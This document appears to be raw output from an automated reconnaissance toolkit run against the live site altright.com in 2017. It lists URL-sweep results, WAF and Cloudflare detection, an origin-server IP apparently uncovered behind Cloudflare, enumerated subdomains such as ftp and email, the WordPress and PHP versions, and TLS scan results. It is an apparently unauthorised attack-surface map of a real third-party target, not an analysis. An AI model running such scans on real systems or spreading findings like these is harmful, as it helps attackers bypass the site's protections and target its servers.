- |_[ + ] [ 53 / 100 ]-[07:59:37] [ - ]
- |_[ + ] Target:: [ https://altright.com/category/news/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 54 / 100 ]-[07:59:37] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/rapefugees/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 55 / 100 ]-[07:59:38] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/altright/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 56 / 100 ]-[07:59:39] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/richardstorey/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 57 / 100 ]-[07:59:41] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/annsterzinger/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 58 / 100 ]-[07:59:42] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/women/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 59 / 100 ]-[07:59:43] [ - ]
- |_[ + ] Target:: [ https://altright.com/category/culture/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 60 / 100 ]-[07:59:44] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/blondie/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 61 / 100 ]-[07:59:45] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/righton/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 62 / 100 ]-[07:59:46] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/colinnliddell/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 63 / 100 ]-[07:59:47] [ - ]
- |_[ + ] Target:: [ https://altright.com/category/perspective/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 64 / 100 ]-[07:59:48] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/ahab/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 65 / 100 ]-[07:59:49] [ - ]
- |_[ + ] Target:: [ https://altright.com/reading-list/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 66 / 100 ]-[07:59:51] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/arktos/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 67 / 100 ]-[07:59:52] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/davidgellerman/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 68 / 100 ]-[07:59:53] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/melissa/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 69 / 100 ]-[07:59:54] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/radix/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 70 / 100 ]-[07:59:55] [ - ]
- |_[ + ] Target:: [ https://altright.com/2017/09/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 71 / 100 ]-[07:59:57] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/millennialwoes/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 72 / 100 ]-[07:59:58] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/race/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 73 / 100 ]-[07:59:59] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/podcast/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 74 / 100 ]-[08:00:00] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/guest/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 75 / 100 ]-[08:00:01] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/alexanderdugin/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 76 / 100 ]-[08:00:02] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/richardspencer/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 77 / 100 ]-[08:00:03] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/antifa/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 78 / 100 ]-[08:00:04] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/vlaw/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 79 / 100 ]-[08:00:06] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/metapolitisk-ordlista/kulturmarxism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 80 / 100 ]-[08:00:07] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/archeofuturism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 81 / 100 ]-[08:00:08] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/hannibalbateman/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 82 / 100 ]-[08:00:09] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/taramccarthy/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 83 / 100 ]-[08:00:11] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/aradmin/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 84 / 100 ]-[08:00:12] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/altrightpolitics/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 85 / 100 ]-[08:00:13] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/honoringourhistory/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 86 / 100 ]-[08:00:14] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/diversity/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 87 / 100 ]-[08:00:15] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/danielfriberg/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 88 / 100 ]-[08:00:16] [ - ]
- |_[ + ] Target:: [ https://altright.com/page/107/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 89 / 100 ]-[08:00:18] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/identitarianism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 90 / 100 ]-[08:00:18] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/katebernard/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 91 / 100 ]-[08:00:19] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/discord/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 92 / 100 ]-[08:00:20] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/sweden/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 93 / 100 ]-[08:00:21] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/christoffer-dulny/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 94 / 100 ]-[08:00:22] [ - ]
- |_[ + ] Target:: [ https://altright.com/page/304/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 95 / 100 ]-[08:00:23] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/thisaltrightlife/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 96 / 100 ]-[08:00:24] [ - ]
- |_[ + ] Target:: [ https://altright.com/tag/healthcare/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 97 / 100 ]-[08:00:25] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/stephenmcnallen/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 98 / 100 ]-[08:00:26] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/kulturalkampf/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 99 / 100 ]-[08:00:27] [ - ]
- |_[ + ] Target:: [ https://altright.com/author/soren/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [28-09-2017 08:00:27]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-altright.com.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://altright.com
- The site https://altright.com is behind a CloudFlare
- Number of requests: 1
- + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
- ____ _ _ _____ _ _
- / ___| | ___ _ _ __| | ___|_ _(_) |
- | | | |/ _ \| | | |/ _` | |_ / _` | | |
- | |___| | (_) | |_| | (_| | _| (_| | | |
- \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
- v1.0.1 by m0rtem
- [08:00:31] Initializing CloudFail - the date is: 28/09/2017
- [08:00:31] Fetching initial information from: altright.com...
- [08:00:31] Server IP: 104.27.179.91
- [08:00:31] Testing if altright.com is on the Cloudflare network...
- [08:00:31] altright.com is part of the Cloudflare network!
- [08:00:31] Testing for misconfigured DNS using dnsdumpster...
- [08:00:33] [FOUND:HOST] altright.com cloudflare-nginx 104.27.178.91 AS13335 Cloudflare Inc
- [08:00:33] [FOUND:HOST] www.altright.com cloudflare-nginx 104.27.178.91 AS13335 Cloudflare Inc
- [08:00:33] [FOUND:HOST] www.altright.com cloudflare-nginx 104.27.179.91 AS13335 Cloudflare Inc
- [08:00:33] [FOUND:HOST] altright.com Apache 50.62.56.213 AS26496 GoDaddy.com, LLC United States
- [08:00:33] [FOUND:DNS] elaine.ns.cloudflare.com. 173.245.58.152 AS13335 Cloudflare Inc United States
- [08:00:33] [FOUND:DNS] marek.ns.cloudflare.com. 173.245.59.202 AS13335 Cloudflare Inc United States
- [08:00:33] [FOUND:MX] 50.62.56.213 AS26496 GoDaddy.com, LLC 0 dc-c0dd11b34a77.altright.com.
- [08:00:33] Scanning crimeflare database...
- [08:00:34] [FOUND:IP] 50.62.56.213
- [08:00:34] Scanning 2897 subdomains (subdomains.txt), please wait...
- [08:00:56] [FOUND:SUBDOMAIN] autodiscover.altright.com IP: 40.97.158.120 HTTP: 200
- [08:01:57] [FOUND:SUBDOMAIN] email.altright.com IP: 72.167.218.45 HTTP: 200
- [08:02:09] [FOUND:SUBDOMAIN] ftp.altright.com IP: 50.62.56.213 HTTP: 200
- [08:02:51] [FOUND:SUBDOMAIN] mail.altright.com ON CLOUDFLARE NETWORK!
- [08:04:33] [FOUND:SUBDOMAIN] static.altright.com ON CLOUDFLARE NETWORK!
- [08:05:14] [FOUND:SUBDOMAIN] www.altright.com ON CLOUDFLARE NETWORK!
- [08:05:27] Scanning finished...
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- https://altright.com [200 OK] CloudFlare, Cookies[__cfduid,wfvt_2729720346], Country[UNITED STATES][US], Google-Analytics[Universal][UA-90381947-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid,wfvt_2729720346], IP[104.27.179.91], MetaGenerator[WordPress 4.8.2], Open-Graph-Protocol[website], PHP[5.6.31], Script[application/javascript,text/javascript], Title[AltRight.com], UncommonHeaders[link,cf-ray], WordPress[4.8.2], X-Powered-By[PHP/5.6.31]
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginHSTS
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- altright.com:443 => 2400:cb00:2048:1::681b:b35b:443
- SCAN RESULTS FOR ALTRIGHT.COM:443 - 2400:CB00:2048:1::681B:B35B:443
- -------------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 3af38101a73a8494677d499017a4e3efdd1904b5
- Common Name: sni190556.cloudflaressl.com
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Serial Number: 6DBD6BD78F91E08014D6D046DB20B529
- Not Before: Aug 12 00:00:00 2017 GMT
- Not After: Feb 18 23:59:59 2018 GMT
- Signature Algorithm: ecdsa-with-SHA256
- Public Key Algorithm: id-ecPublicKey
- Key Size: 256 bit
- X509v3 Subject Alternative Name: {'DNS': ['sni190556.cloudflaressl.com', '*.444ttg.com', '*.66ddl.com', '*.6yyl.com', '*.altright.com', '*.arktos.com', '*.biseznamka.com', '*.deitti-sivut.com', '*.dsfredmdtom.cf', '*.eggendk.cf', '*.embroiddesigns.net', '*.foragerproject.com', '*.huntingdonmcdonalds.com', '*.jomsey.altervista.org', '*.joyeati.cf', '*.lewfi.stream', '*.minnehaha-kendo.org', '*.minnehahakendodojo.org', '*.mujeresbolivia.com', '*.punkchat.co.za', '*.smart-eas.ru', '*.spankingchat.ca', '*.teacoal.xyz', '444ttg.com', '66ddl.com', '6yyl.com', 'altright.com', 'arktos.com', 'biseznamka.com', 'deitti-sivut.com', 'dsfredmdtom.cf', 'eggendk.cf', 'embroiddesigns.net', 'foragerproject.com', 'huntingdonmcdonalds.com', 'jomsey.altervista.org', 'joyeati.cf', 'lewfi.stream', 'minnehaha-kendo.org', 'minnehahakendodojo.org', 'mujeresbolivia.com', 'punkchat.co.za', 'smart-eas.ru', 'spankingchat.ca', 'teacoal.xyz']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['sni190556.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
- * Certificate - OCSP Stapling:
- OCSP Response Status: successful
- Validation w/ Mozilla's CA Store: OK - Response is trusted
- Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
- Cert Status: good
- Cert Serial Number: 6DBD6BD78F91E08014D6D046DB20B529
- This Update: Sep 24 23:54:56 2017 GMT
- Next Update: Oct 1 23:54:56 2017 GMT
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 0.62 S
- ------------------------
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server altright.com on port 443 using SNI name altright.com
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
- Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
